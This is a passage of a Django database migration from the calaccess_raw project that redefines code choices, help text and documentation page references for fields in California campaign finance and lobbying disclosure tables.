field=calaccess_raw.fields.CharField(blank=True, choices=[('ATR', 'Assistant treasurer'), ('CAO', 'Candidate/officeholder'), ('TRE', 'Treasurer'), ('OFF', 'Officer'), ('PRO', 'Proponent'), ('SPO', 'Sponsor'), ('atr', 'Treasurer'), ('tre', 'Assistant treasurer'), ('cao', 'Candidate/officeholder'), ('MDI', 'Major Donor/Ind Expenditure'), ('POF', 'Principal officer'), ('RCP', 'Recipient committee'), ('COA', 'Candidate/officeholder'), ('0', 'Unknown'), ('BBB', 'Unknown'), ('CON', 'Unknown'), ('MAI', 'Unknown')], db_column='ENTITY_CD', documentcloud_pages=[calaccess_raw.annotations.DocumentCloud(id='2712033-Cal-Format-1-05-02', start_page=9), calaccess_raw.annotations.DocumentCloud(id='2712033-Cal-Format-1-05-02', start_page=25), calaccess_raw.annotations.DocumentCloud(id='2712034-Cal-Format-201', start_page=11), calaccess_raw.annotations.DocumentCloud(id='2712034-Cal-Format-201', start_page=34)], help_text='Entity Code', max_length=3, verbose_name='entity code'),
),
migrations.AlterField(
model_name='cvr3verificationinfocd',
name='form_type',
field=calaccess_raw.fields.CharField(choices=[('F400', 'Form 400 (Statement of Organization (Slate Mailer Organization)): Part 5, Verification'), ('F401', 'Form 401 (Campaign Disclosure Statement (Slate Mailer Organization)): Cover Page'), ('F402', 'Form 402 (Statement of Termination (Slate Mailer Organization)): Verification'), ('F410', 'Form 410 (Statement of Organization (Recipient Committee)): Part 3, Verification'), ('F425', 'Form 425 (Semi-Annual Statement of No Activity (Recipient Committee)): Part 3, Verification'), ('F450', 'Form 450 (Campaign Disclosure Statement, Short Form (Recipient Committee)): Part 4, Verification'), ('F460', 'Form 460 (Campaign Disclosure Statement (Recipient Committee)): Cover Page, Part 1'), ('F461', 'Form 461 (Campaign Disclosure Statement (Independent Expenditure Committee & Major Donor Committee)): Part 4, Verification'), ('F465', 'Form 465 (Supplemental Independent Expenditure Report): Part 6, Verification'), ('F511', 'Form 511: Paid Spokesperson Report'), ('F900', 'Form 900: Campaign Disclosure Statement (Public employee retirement board candidate)')], db_column='FORM_TYPE', db_index=True, documentcloud_pages=[calaccess_raw.annotations.DocumentCloud(id='2712033-Cal-Format-1-05-02', start_page=50), calaccess_raw.annotations.DocumentCloud(id='2712034-Cal-Format-201', start_page=64)], help_text='Name of the source filing form or schedule', max_length=4),
),
migrations.AlterField(
model_name='cvrcampaigndisclosurecd',
name='entity_cd',
field=calaccess_raw.fields.CharField(blank=True, choices=[('BMC', 'Ballot measure committee'), ('CAO', 'Candidate/officeholder'), ('COM', 'Committee'), ('CTL', 'Controlled committee'), ('IND', 'Individual'), ('MDI', 'Major Donor/Ind Expenditure'), ('OTH', 'Other'), ('PTY', 'Political Party'), ('RCP', 'Recipient committee'), ('SCC', 'Small Contributor Committee'), ('SMO', 'Slate-mailer organization')], db_column='ENTITY_CD', documentcloud_pages=[calaccess_raw.annotations.DocumentCloud(end_page=9, id='2712033-Cal-Format-1-05-02', start_page=8), calaccess_raw.annotations.DocumentCloud(end_page=11, id='2712034-Cal-Format-201', start_page=9), calaccess_raw.annotations.DocumentCloud(id='2711616-MapCalFormat2Fields', start_page=6), calaccess_raw.annotations.DocumentCloud(id='2712033-Cal-Format-1-05-02', start_page=18), calaccess_raw.annotations.DocumentCloud(id='2712034-Cal-Format-201', start_page=22)], help_text='The entity type of the filer. These codes vary by form type.', max_length=4, verbose_name='entity code'),
),
migrations.AlterField(
model_name='cvrcampaigndisclosurecd',
name='form_type',
field=calaccess_raw.fields.CharField(choices=[('F401', 'Form 401: Campaign Disclosure Statement (Slate Mailer Organization)'), ('F425', 'Form 425: Semi-Annual Statement of No Activity (Recipient Committee)'), ('F450', 'Form 450: Campaign Disclosure Statement, Short Form (Recipient Committee)'), ('F460', 'Form 460: Campaign Disclosure Statement (Recipient Committee)'), ('F461', 'Form 461: Campaign Disclosure Statement (Independent Expenditure Committee & Major Donor Committee)'), ('F465', 'Form 465: Supplemental Independent Expenditure Report'), ('F496', 'Form 496: Late Independent Expenditure Report'), ('F497', 'Form 497: Late Contribution Report'), ('F498', 'Form 498: Late Payment Report (Slate Mailer Organization)'), ('F511', 'Form 511: Paid Spokesperson Report'), ('F900', 'Form 900: Campaign Disclosure Statement (Public employee retirement board candidate)')], db_column='FORM_TYPE', documentcloud_pages=[calaccess_raw.annotations.DocumentCloud(id='2712033-Cal-Format-1-05-02', start_page=18), calaccess_raw.annotations.DocumentCloud(id='2712034-Cal-Format-201', start_page=22)], help_text='Name of the source filing form or schedule', max_length=4),
),
migrations.AlterField(
model_name='cvrcampaigndisclosurecd',
name='juris_cd',
field=calaccess_raw.fields.CharField(blank=True, choices=[('ASM', 'Assembly District'), ('BOE', 'Board of Equalization District'), ('CIT', 'City'), ('CTY', 'County'), ('LOC', 'Local'), ('OTH', 'Other'), ('SEN', 'Senate District'), ('STW', 'Statewide'), ('sen', 'Senate District'), ('Gov', 'Statewide'), ('ATT', 'Statewide'), ('CON', 'Statewide'), ('GOV', 'Statewide'), ('SOS', 'Statewide'), ('SPM', 'Statewide'), ('46', 'Assembly District'), ('55', 'Assembly District'), ('BSU', 'County'), ('CSU', 'County'), ('DAT', 'County'), ('SHC', 'County'), ('MAY', 'City'), ('CCM', 'City'), ('APP', 'Other'), ('BED', 'Other'), ('SCJ', 'Other'), ('SD', 'Other'), ('OC', 'County'), ('AD', 'Assembly District'), ('CA', 'Unknown'), ('F', 'Unknown')], db_column='JURIS_CD', documentcloud_pages=[calaccess_raw.annotations.DocumentCloud(id='2711616-MapCalFormat2Fields', start_page=13), calaccess_raw.annotations.DocumentCloud(end_page=22, id='2712033-Cal-Format-1-05-02', start_page=21), calaccess_raw.annotations.DocumentCloud(end_page=29, id='2712034-Cal-Format-201', start_page=28)], help_text='Office jurisdiction code', max_length=3),
),
migrations.AlterField(
model_name='cvrcampaigndisclosurecd',
name='off_s_h_cd',
field=calaccess_raw.fields.CharField(blank=True, choices=[('S', 'SOUGHT'), ('H', 'HELD'), ('s', 'SOUGHT'), ('h', 'HELD'), ('F', 'UNKNOWN'), ('O', 'UNKNOWN')], db_column='OFF_S_H_CD', documentcloud_pages=[calaccess_raw.annotations.DocumentCloud(id='2712033-Cal-Format-1-05-02', start_page=21), calaccess_raw.annotations.DocumentCloud(id='2712034-Cal-Format-201', start_page=28)], help_text='Office is sought or held code', max_length=1),
),
migrations.AlterField(
model_name='cvrcampaigndisclosurecd',
name='office_cd',
field=calaccess_raw.fields.CharField(blank=True, choices=[('APP', 'State Appellate Court Justice'), ('ASM', 'State Assembly Person'), ('ASR', 'Assessor'), ('ATT', 'Attorney General'), ('BED', 'Board of Education'), ('BOE', 'Board of Equalization Member'), ('BSU', 'Board of Supervisors'), ('CAT', 'City Attorney'), ('CCB', 'Community College Board'), ('CCM', 'City Council Member'), ('CON', 'State Controller'), ('COU', 'County Counsel'), ('CSU', 'County Supervisor'), ('CTR', 'Local Controller'), ('DAT', 'District Attorney'), ('GOV', 'Governor'), ('INS', 'Insurance Commissioner'), ('LTG', 'Lieutenant Governor'), ('MAY', 'Mayor'), ('OTH', 'Other'), ('PDR', 'Public Defender'), ('PER', 'Public Employees Retirement System'), ('PLN', 'Planning Commissioner'), ('SCJ', 'Superior Court Judge'), ('SEN', 'State Senator'), ('SHC', 'Sheriff-Coroner'), ('SOS', 'Secretary of State'), ('SPM', 'Supreme Court Justice'), ('SUP', 'Superintendent of Public Instruction'), ('TRE', 'State Treasurer'), ('TRS', 'Local Treasurer'), ('Gov', 'Governor'), ('Sen', 'State Senator'), ('LOC', 'Community College Board'), ('LEG', 'State Senator'), ('REP', 'State Assembly Person'), ('Mem', 'Other'), ('CIT', 'State Assembly Person'), ('PAC', 'Unknown'), ('F', 'Unknown'), ('COM', 'Unknown')], db_column='OFFICE_CD', documentcloud_pages=[calaccess_raw.annotations.DocumentCloud(id='2712033-Cal-Format-1-05-02', start_page=10), calaccess_raw.annotations.DocumentCloud(id='2712034-Cal-Format-201', start_page=12)], help_text='Identifies the office being sought', max_length=3, verbose_name='office code'),
),
migrations.AlterField(
model_name='cvrcampaigndisclosurecd',
name='reportname',
field=calaccess_raw.fields.CharField(blank=True, choices=[('450', 'Form 450: Campaign Disclosure Statement, Short Form (Recipient Committee)'), ('460', 'Form 460: Campaign Disclosure Statement (Recipient Committee)'), ('461', 'Form 461: Campaign Disclosure Statement (Independent Expenditure Committee & Major Donor Committee)')], db_column='REPORTNAME', documentcloud_pages=(calaccess_raw.annotations.DocumentCloud(id='2712033-Cal-Format-1-05-02', start_page=15), calaccess_raw.annotations.DocumentCloud(id='2712033-Cal-Format-1-05-02', start_page=20), calaccess_raw.annotations.DocumentCloud(id='2712034-Cal-Format-201', start_page=19), calaccess_raw.annotations.DocumentCloud(id='2712034-Cal-Format-201', start_page=26)), help_text='Attached campaign disclosure statement type. Legal values are 450, 460, and 461.', max_length=3),
),
migrations.AlterField(
model_name='cvrcampaigndisclosurecd',
name='stmt_type',
field=calaccess_raw.fields.CharField(blank=True, choices=[('PE', 'Pre-Election (F450, F460)'), ('QT', 'Quarterly Stmt (F450,F460)'), ('SA', 'Semi-annual (F450, F460)'), ('SE', 'Supplemental Pre-elect (F450, F460, F495)'), ('SY', 'Special Odd-Yr. Campaign (F450, F460)'), ('S1', 'Semi-Annual (Jan1-Jun30) (F425)'), ('S2', 'Semi-Annual (Jul1-Dec31) (F425)'), ('TS', 'Termination Statement (F450, F460)'), ('pe', 'Pre-Election (F450, F460)'), ('qt', 'Quarterly Stmt (F450,F460)'), ('sa', 'Semi-annual (F450, F460)'), ('se', 'Supplemental Pre-elect (F450, F460, F495)'), ('sy', 'Special Odd-Yr. Campaign (F450, F460)'), ('ts', 'Termination Statement (F450, F460)'), ('**', 'Amendment'), ('1', 'Unknown'), ('2', 'Unknown'), ('CA', 'Unknown'), ('MD', 'Unknown'), ('NA', 'Unknown'), ('PR', 'Unknown'), ('QS', 'Unknown'), ('S', 'Unknown'), ('x', 'Unknown'), ('YE', 'Unknown')], db_column='STMT_TYPE', documentcloud_pages=[calaccess_raw.annotations.DocumentCloud(id='2711616-MapCalFormat2Fields', start_page=7), calaccess_raw.annotations.DocumentCloud(id='2712033-Cal-Format-1-05-02', start_page=18), calaccess_raw.annotations.DocumentCloud(id='2712034-Cal-Format-201', start_page=23)], help_text='Type of statement', max_length=2),
),
migrations.AlterField(
model_name='cvrcampaigndisclosurecd',
name='sup_opp_cd',
field=calaccess_raw.fields.CharField(blank=True, choices=[('S', 'SUPPORT'), ('O', 'OPPOSITION'), ('s', 'SUPPORT'), ('o', 'OPPOSITION')], db_column='SUP_OPP_CD', documentcloud_pages=[calaccess_raw.annotations.DocumentCloud(id='2711614-CalAccessTablesWeb', start_page=28), calaccess_raw.annotations.DocumentCloud(id='2711616-MapCalFormat2Fields', start_page=14), calaccess_raw.annotations.DocumentCloud(id='2712033-Cal-Format-1-05-02', start_page=21), calaccess_raw.annotations.DocumentCloud(id='2712034-Cal-Format-201', start_page=28)], help_text='Support or opposition code', max_length=1),
),
migrations.AlterField(
model_name='cvre530cd',
name='entity_cd',
field=calaccess_raw.fields.CharField(blank=True, choices=[('ATH', 'Authorizing individual'), ('ATR', 'Assistant treasurer'), ('BMC', 'Ballot measure committee'), ('BNM', "Ballot measure's name/title"), ('CAO', 'Candidate/officeholder'), ('COM', 'Committee'), ('CTL', 'Controlled committee'), ('IND', 'Individual'), ('MDI', 'Major Donor/Ind Expenditure'), ('OFF', 'Officer'), ('OTH', 'Other'), ('POF', 'Principal officer'), ('PRO', 'Proponent'), ('PTY', 'Political Party'), ('RCP', 'Recipient committee'), ('SCC', 'Small Contributor Committee'), ('SMO', 'Slate-mailer organization'), ('SPO', 'Sponsor'), ('TRE', 'Treasurer')], db_column='ENTITY_CD', documentcloud_pages=[calaccess_raw.annotations.DocumentCloud(end_page=9, id='2712033-Cal-Format-1-05-02', start_page=8), calaccess_raw.annotations.DocumentCloud(end_page=11, id='2712034-Cal-Format-201', start_page=9)], help_text='entity code', max_length=32, verbose_name='entity code'),
),
migrations.AlterField(
model_name='cvre530cd',
name='form_type',
field=calaccess_raw.fields.CharField(choices=[('E530', 'Electronic Form 530: Electronic Issue Advocacy Report')], db_column='FORM_TYPE', db_index=True, help_text='Name of the source filing form or schedule', max_length=4, verbose_name='form type'),
),
migrations.AlterField(
model_name='cvrf470cd',
name='entity_cd',
field=calaccess_raw.fields.CharField(blank=True, choices=[('CAO', 'Candidate/officeholder')], db_column='ENTITY_CD', documentcloud_pages=[calaccess_raw.annotations.DocumentCloud(id='2712033-Cal-Format-1-05-02', start_page=22), calaccess_raw.annotations.DocumentCloud(id='2712034-Cal-Format-201', start_page=29)], help_text="The filer's entity code. The value of this column will always be Candidate/Office Holder (CAO) for this table.", max_length=3),
),
migrations.AlterField(
model_name='cvrf470cd',
name='form_type',
field=calaccess_raw.fields.CharField(choices=[('F470', 'Form 470: Campaign Disclosure Statement, Short Form (Officeholders and Candidates)')], db_column='FORM_TYPE', db_index=True, documentcloud_pages=[calaccess_raw.annotations.DocumentCloud(id='2712033-Cal-Format-1-05-02', start_page=22), calaccess_raw.annotations.DocumentCloud(id='2712034-Cal-Format-201', start_page=29)], help_text='Type of Filing or Formset. The value of this column will always be equal to F470.', max_length=4),
),
migrations.AlterField(
model_name='cvrf470cd',
name='juris_cd',
field=calaccess_raw.fields.CharField(blank=True, choices=[('ASM', 'Assembly District'), ('BOE', 'Board of Equalization District'), ('CIT', 'City'), ('CTY', 'County'), ('LOC', 'Local'), ('OTH', 'Other'), ('SEN', 'Senate District'), ('STW', 'Statewide')], db_column='JURIS_CD', documentcloud_pages=[calaccess_raw.annotations.DocumentCloud(id='2712033-Cal-Format-1-05-02', start_page=22), calaccess_raw.annotations.DocumentCloud(id='2712034-Cal-Format-201', start_page=29)], help_text='Office Jurisdiction Code', max_length=3),
),
migrations.AlterField(
model_name='cvrf470cd',
name='off_s_h_cd',
field=calaccess_raw.fields.CharField(blank=True, choices=[('H', 'HELD'), ('S', 'SOUGHT')], db_column='OFF_S_H_CD', documentcloud_pages=[calaccess_raw.annotations.DocumentCloud(id='2712033-Cal-Format-1-05-02', start_page=22), calaccess_raw.annotations.DocumentCloud(id='2712034-Cal-Format-201', start_page=30)], help_text='Office Sought/Held code. Legal values are "S" for sought and "H" for held.', max_length=1),
),
migrations.AlterField(
model_name='cvrf470cd',
name='office_cd',
field=calaccess_raw.fields.CharField(blank=True, choices=[('APP', 'State Appellate Court Justice'), ('ASM', 'State Assembly Person'), ('ASR', 'Assessor'), ('ATT', 'Attorney General'), ('BED', 'Board of Education'), ('BOE', 'Board of Equalization Member'), ('BSU', 'Board of Supervisors'), ('CAT', 'City Attorney'), ('CCB', 'Community College Board'), ('CCM', 'City Council Member'), ('CON', 'State Controller'), ('COU', 'County Counsel'), ('CSU', 'County Supervisor'), ('CTR', 'Local Controller'), ('DAT', 'District Attorney'), ('GOV', 'Governor'), ('INS', 'Insurance Commissioner'), ('LTG', 'Lieutenant Governor'), ('MAY', 'Mayor'), ('OTH', 'Other'), ('PDR', 'Public Defender'), ('PER', 'Public Employees Retirement System'), ('PLN', 'Planning Commissioner'), ('SCJ', 'Superior Court Judge'), ('SEN', 'State Senator'), ('SHC', 'Sheriff-Coroner'), ('SOS', 'Secretary of State'), ('SPM', 'Supreme Court Justice'), ('SUP', 'Superintendent of Public Instruction'), ('TRE', 'State Treasurer'), ('TRS', 'Local Treasurer')], db_column='OFFICE_CD', documentcloud_pages=[calaccess_raw.annotations.DocumentCloud(id='2712033-Cal-Format-1-05-02', start_page=22), calaccess_raw.annotations.DocumentCloud(id='2712034-Cal-Format-201', start_page=29)], help_text='Code that identifies the office being sought. See the CAL document for a list of valid codes.', max_length=3),
),
migrations.AlterField(
model_name='cvrlobbydisclosurecd',
name='entity_cd',
field=calaccess_raw.fields.CharField(blank=True, choices=[('CLI', 'Unknown'), ('FRM', 'Lobbying Firm'), ('IND', 'Person (spending > $5000)'), ('LBY', 'Lobbyist (an individual)'), ('LCO', 'Lobbying Coalition'), ('LEM', 'Lobbying Employer'), ('OTH', 'Other')], db_column='ENTITY_CD', documentcloud_pages=[calaccess_raw.annotations.DocumentCloud(id='2712033-Cal-Format-1-05-02', start_page=53), calaccess_raw.annotations.DocumentCloud(id='2712034-Cal-Format-201', start_page=67)], help_text='Entity Code describing the filer', max_length=3, verbose_name='entity code'),
),
migrations.AlterField(
model_name='cvrlobbydisclosurecd',
name='form_type',
field=calaccess_raw.fields.CharField(choices=[('F615', 'Form 615: Lobbyist Report'), ('F625', 'Form 625: Report of Lobbying Firm'), ('F635', 'Form 635: Report of Lobbyist Employer or Report of Lobbying Coalition'), ('F645', 'Form 645: Report of Person Spending $5,000 or More')], db_column='FORM_TYPE', db_index=True, documentcloud_pages=[calaccess_raw.annotations.DocumentCloud(id='2712033-Cal-Format-1-05-02', start_page=53), calaccess_raw.annotations.DocumentCloud(id='2712034-Cal-Format-201', start_page=66)], help_text='Name of the source filing form or schedule', max_length=4),
),
migrations.AlterField(
model_name='cvrregistrationcd',
name='entity_cd',
field=calaccess_raw.fields.CharField(blank=True, choices=[('BUS', 'Unknown'), ('FRM', 'Lobbying Firm'), ('LBY', 'Lobbyist (an individual)'), ('LCO', 'Lobbying Coalition'), ('LEM', 'Lobbying Employer')], db_column='ENTITY_CD', documentcloud_pages=[calaccess_raw.annotations.DocumentCloud(id='2712034-Cal-Format-201', start_page=82), calaccess_raw.annotations.DocumentCloud(id='2712033-Cal-Format-1-05-02', start_page=68)], help_text='Entity Code describing the filer', max_length=3, verbose_name='entity code'),
),
migrations.AlterField(
model_name='cvrregistrationcd',
name='form_type',
field=calaccess_raw.fields.CharField(choices=[('F601', 'Form 601: Lobbying Firm Registration Statement'), ('F602', 'Form 602: Lobbying Firm Activity Authorization'), ('F603', 'Form 603: Lobbyist Employer or Lobbying Coalition Registration Statement'), ('F604', 'Form 604: Lobbyist Certification Statement'), ('F606', 'Form 606: Notice of Termination'), ('F607', 'Form 607: Notice of Withdrawal')], db_column='FORM_TYPE', db_index=True, documentcloud_pages=[calaccess_raw.annotations.DocumentCloud(id='2712033-Cal-Format-1-05-02', start_page=68), calaccess_raw.annotations.DocumentCloud(id='2712034-Cal-Format-201', start_page=82)], help_text='Name of the source filing form or schedule', max_length=4),
),
migrations.AlterField(
model_name='cvrsocd',
name='entity_cd',
field=calaccess_raw.fields.CharField(blank=True, choices=[('BMC', 'Ballot measure committee'), ('CAO', 'Candidate/officeholder'), ('COM', 'Committee'), ('CTL', 'Controlled committee'), ('RCP', 'Recipient committee'), ('SMO', 'Slate-mailer organization')], db_column='ENTITY_CD', documentcloud_pages=[calaccess_raw.annotations.DocumentCloud(end_page=9, id='2712033-Cal-Format-1-05-02', start_page=8), calaccess_raw.annotations.DocumentCloud(end_page=11, id='2712034-Cal-Format-201', start_page=9), calaccess_raw.annotations.DocumentCloud(id='2712033-Cal-Format-1-05-02', start_page=46), calaccess_raw.annotations.DocumentCloud(id='2712034-Cal-Format-201', start_page=59)], help_text='Entity Code of the Filer. Values: SMO - Slate Mailer Organization (F400,402) [COM|RCP] - Recipient Committee (F410)', max_length=3, verbose_name='Entity code'),
),
migrations.AlterField(
model_name='cvrsocd',
name='form_type',
field=calaccess_raw.fields.CharField(choices=[('F400', 'Form 400: Statement of Organization (Slate Mailer Organization)'), ('F402', 'Form 402: Statement of Termination (Slate Mailer Organization)'), ('F410', 'Form 410: Statement of Organization (Recipient Committee)')], db_column='FORM_TYPE', documentcloud_pages=[calaccess_raw.annotations.DocumentCloud(id='2712033-Cal-Format-1-05-02', start_page=46), calaccess_raw.annotations.DocumentCloud(id='2712034-Cal-Format-201', start_page=59)], help_text='Name of the source filing form or schedule', max_length=4, verbose_name='form type'),
),
migrations.AlterField(
model_name='debtcd',
name='entity_cd',
field=calaccess_raw.fields.CharField(blank=True, choices=[('BNM', "Ballot measure's name/title"), ('COM', 'Committee'), ('IND', 'Individual'), ('OTH', 'Other'), ('PTY', 'Political Party'), ('RCP', 'Recipient committee'), ('SCC', 'Small Contributor Committee')], db_column='ENTITY_CD', documentcloud_pages=[calaccess_raw.annotations.DocumentCloud(end_page=9, id='2712033-Cal-Format-1-05-02', start_page=8), calaccess_raw.annotations.DocumentCloud(end_page=11, id='2712034-Cal-Format-201', start_page=9), calaccess_raw.annotations.DocumentCloud(id='2712033-Cal-Format-1-05-02', start_page=33), calaccess_raw.annotations.DocumentCloud(id='2712034-Cal-Format-201', start_page=45)], help_text='Entity code describing the payee', max_length=3, verbose_name='entity code'),
),
migrations.AlterField(
model_name='debtcd',
name='expn_code',
field=calaccess_raw.fields.CharField(blank=True, choices=[('CMP', 'campaign paraphernalia/miscellaneous'), ('CNS', 'campaign consultants'), ('CTB', 'contribution (if nonmonetary, explain)*'), ('CVC', 'civic donations'), ('FIL', 'candidate filing/ballot feeds'), ('FND', 'fundraising events'), ('IKD', 'In-kind contribution (nonmonetary)'), ('IND', 'independent expenditure supporting/opposing others (explain)*'), ('LEG', 'legal defense'), ('LIT', 'campaign literature and mailings'), ('LON', 'loan'), ('MBR', 'member communications'), ('MON', 'monetary contribution'), ('MTG', 'meetings and appearances'), ('OFC', 'office expenses'), ('PET', 'petition circulating'), ('PHO', 'phone banks'), ('POL', 'polling and survey research'), ('POS', 'postage, delivery and messenger services'), ('PRO', 'professional services (legal, accounting)'), ('PRT', 'print ads'), ('RAD', 'radio airtime and production costs'), ('RFD', 'returned contributions'), ('SAL', 'campaign workers salaries'), ('TEL', 'T.V. or cable airtime and production costs'), ('TRC', 'candidate travel, lodging and meals (explain)'), ('TRS', 'staff/spouse travel, lodging and meals (explain)'), ('TSF', 'transfer between committees of the same candidate/sponsor'), ('VOT', 'voter registration'), ('WEB', 'information technology costs (internet, e-mail)'), ('Fnd', 'fundraising events'), ('ofc', 'office expenses'), ("'CN", 'campaign consultants'), ('*', 'Unknown'), ('AIR', 'Unknown'), ('BUS', 'Unknown'), ('C', 'Unknown'), ('CAM', 'Unknown'), ('CC', 'Unknown'), ('COM', 'Unknown'), ('CON', 'Unknown'), ('CSN', 'Unknown'), ('DEP', 'Unknown'), ('EVE', 'Unknown'), ('F', 'Unknown'), ('FED', 'Unknown'), ('fns', 'Unknown'), ('G', 'Unknown'), ('GGG', 'Unknown'), ('HOT', 'Unknown'), ('L', 'Unknown'), ('LDF', 'Unknown'), ('MEE', 'Unknown'), ('N', 'Unknown'), ('O', 'Unknown'), ('OTH', 'Unknown'), ('P', 'Unknown'), ('PEN', 'Unknown'), ('S', 'Unknown'), ('SPE', 'Unknown'), ('STA', 'Unknown'), ('T', 'Unknown'), ('TAX', 'Unknown'), ('TRA', 'Unknown'), ('V', 'Unknown'), ('X', 'Unknown')], db_column='EXPN_CODE', documentcloud_pages=[calaccess_raw.annotations.DocumentCloud(id='2712033-Cal-Format-1-05-02', start_page=11), calaccess_raw.annotations.DocumentCloud(end_page=14, id='2712034-Cal-Format-201', start_page=13)], help_text='Expense Code', max_length=3, verbose_name='expense code'),
),
migrations.AlterField(
model_name='debtcd',
name='form_type',
field=calaccess_raw.fields.CharField(choices=[('F', 'Form 460 (Campaign Disclosure Statement (Recipient Committee)): Schedule F, Accrued Expenses (Unpaid Bills)')], db_column='FORM_TYPE', documentcloud_pages=[calaccess_raw.annotations.DocumentCloud(id='2712033-Cal-Format-1-05-02', start_page=33), calaccess_raw.annotations.DocumentCloud(id='2712034-Cal-Format-201', start_page=45)], help_text='Schedule Name/ID: (F - Sched F / Accrued Expenses)', max_length=1),
),
migrations.AlterField(
model_name='efsfilinglogcd',
name='form_type',
field=calaccess_raw.fields.CharField(choices=[('F400', 'Form 400: Statement of Organization (Slate Mailer Organization)'), ('F401', 'Form 401: Campaign Disclosure Statement (Slate Mailer Organization)'), ('F402', 'Form 402: Statement of Termination (Slate Mailer Organization)'), ('F410', 'Form 410: Statement of Organization (Recipient Committee)'), ('F425', 'Form 425: Semi-Annual Statement of No Activity (Recipient Committee)'), ('F450', 'Form 450: Campaign Disclosure Statement, Short Form (Recipient Committee)'), ('F460', 'Form 460: Campaign Disclosure Statement (Recipient Committee)'), ('F461', 'Form 461: Campaign Disclosure Statement (Independent Expenditure Committee & Major Donor Committee)'), ('F465', 'Form 465: Supplemental Independent Expenditure Report'), ('F496', 'Form 496: Late Independent Expenditure Report'), ('F497', 'Form 497: Late Contribution Report'), ('F498', 'Form 498: Late Payment Report (Slate Mailer Organization)'), ('F601', 'Form 601: Lobbying Firm Registration Statement'), ('F602', 'Form 602: Lobbying Firm Activity Authorization'), ('F603', 'Form 603: Lobbyist Employer or Lobbying Coalition Registration Statement'), ('F604', 'Form 604: Lobbyist Certification Statement'), ('F606', 'Form 606: Notice of Termination'), ('F607', 'Form 607: Notice of Withdrawal'), ('F615', 'Form 615: Lobbyist Report'), ('F625', 'Form 625: Report of Lobbying Firm'), ('F635', 'Form 635: Report of Lobbyist Employer or Report of Lobbying Coalition'), ('F645', 'Form 645: Report of Person Spending $5,000 or More'), ('BADFORMAT 253', 'Unknown'), ('form', 'Unknown')], db_column='FORM_TYPE', db_index=True, documentcloud_pages=[calaccess_raw.annotations.DocumentCloud(end_page=8, id='2711624-Overview', start_page=4)], help_text='Name of the source filing form or schedule', max_length=250, verbose_name='form type'),
),
migrations.AlterField(
model_name='expncd',
name='entity_cd',
field=calaccess_raw.fields.CharField(blank=True, choices=[('COM', 'Committee'), ('IND', 'Individual'), ('RCP', 'Recipient committee'), ('OTH', 'Other'), ('PTY', 'Political Party'), ('SCC', 'Small Contributor Committee'), ('BNM', "Ballot measure's name/title"), ('CAO', 'Candidate/officeholder'), ('MBR', 'Member of Associaton'), ('OFF', 'Officer'), ('0', 'Unknown'), ('PTH', 'Unknown'), ('RFD', 'Unknown')], db_column='ENTITY_CD', documentcloud_pages=[calaccess_raw.annotations.DocumentCloud(end_page=9, id='2712033-Cal-Format-1-05-02', start_page=8), calaccess_raw.annotations.DocumentCloud(end_page=11, id='2712034-Cal-Format-201', start_page=9), calaccess_raw.annotations.DocumentCloud(id='2712033-Cal-Format-1-05-02', start_page=31), calaccess_raw.annotations.DocumentCloud(id='2712034-Cal-Format-201', start_page=42)], help_text='Entity Code describing payee', max_length=3, verbose_name='entity code'),
),
migrations.AlterField(
model_name='expncd',
name='expn_code',
field=calaccess_raw.fields.CharField(blank=True, choices=[('CMP', 'campaign paraphernalia/miscellaneous'), ('CNS', 'campaign consultants'), ('CTB', 'contribution (if nonmonetary, explain)*'), ('CVC', 'civic donations'), ('FIL', 'candidate filing/ballot feeds'), ('FND', 'fundraising events'), ('IKD', 'In-kind contribution (nonmonetary)'), ('IND', 'independent expenditure supporting/opposing others (explain)*'), ('LEG', 'legal defense'), ('LIT', 'campaign literature and mailings'), ('LON', 'loan'), ('MBR', 'member communications'), ('MON', 'monetary contribution'), ('MTG', 'meetings and appearances'), ('OFC', 'office expenses'), ('PET', 'petition circulating'), ('PHO', 'phone banks'), ('POL', 'polling and survey research'), ('POS', 'postage, delivery and messenger services'), ('PRO', 'professional services (legal, accounting)'), ('PRT', 'print ads'), ('RAD', 'radio airtime and production costs'), ('RFD', 'returned contributions'), ('SAL', 'campaign workers salaries'), ('TEL', 'T.V. or cable airtime and production costs'), ('TRC', 'candidate travel, lodging and meals (explain)'), ('TRS', 'staff/spouse travel, lodging and meals (explain)'), ('TSF', 'transfer between committees of the same candidate/sponsor'), ('VOT', 'voter registration'), ('WEB', 'information technology costs (internet, e-mail)'), ('ctb', 'contribution (if nonmonetary, explain)*'), ('ikd', 'In-kind contribution (nonmonetary)'), ('Mon', 'monetary contribution'), ('ofc', 'office expenses'), ('OFc', 'office expenses'), ('Ofc', 'office expenses'), ('', 'Unknown'), ('*', 'Unknown'), ('0', 'Unknown'), ('001', 'Unknown'), ('011', 'Unknown'), ('200', 'Unknown'), ('401', 'Unknown'), ('ADV', 'Unknown'), ('ANN', 'Unknown'), ('APR', 'Unknown'), ('AUG', 'Unknown'), ('AUT', 'Unknown'), ('Ban', 'Unknown'), ('BAN', 'Unknown'), ('BOO', 'Unknown'), ('BOX', 'Unknown'), ('C', 'Unknown'), ('CAT', 'Unknown'), ('CC', 'Unknown'), ('CHE', 'Unknown'), ('CIV', 'Unknown'), ('CNT', 'Unknown'), ('CON', 'Unknown'), ('COP', 'Unknown'), ('CRE', 'Unknown'), ('CSN', 'Unknown'), ('CT', 'Unknown'), (',CT', 'Unknown'), ('.CT', 'Unknown'), ('CTN', 'Unknown'), ('CVD', 'Unknown'), ('DAT', 'Unknown'), ('DEC', 'Unknown'), ('Dem', 'Unknown'), ('DIN', 'Unknown'), ('Don', 'Unknown'), ('DON', 'Unknown'), ('Ear', 'Unknown'), ('EIM', 'Unknown'), ('EMP', 'Unknown'), ('F', 'Unknown'), ('FAX', 'Unknown'), ('FDN', 'Unknown'), ('FED', 'Unknown'), ('FEE', 'Unknown'), ('FIN', 'Unknown'), ('Fun', 'Unknown'), ('FUN', 'Unknown'), ('G', 'Unknown'), ('GEN', 'Unknown'), ('GGG', 'Unknown'), ('GOT', 'Unknown'), ('IEs', 'Unknown'), ('IN-', 'Unknown'), ('Ina', 'Unknown'), ('INK', 'Unknown'), ('INS', 'Unknown'), ('ITE', 'Unknown'), ('JAN', 'Unknown'), ('JUL', 'Unknown'), ('JUN', 'Unknown'), ('KIC', 'Unknown'), ('L', 'Unknown'), ('LEV', 'Unknown'), ('Lit', 'Unknown'), ('LN#', 'Unknown'), ('LOG', 'Unknown'), ('M', 'Unknown'), ('MAI', 'Unknown'), ('Mar', 'Unknown'), ('MAR', 'Unknown'), ('MAY', 'Unknown'), ('MED', 'Unknown'), ('MEE', 'Unknown'), ('MGT', 'Unknown'), ('Mis', 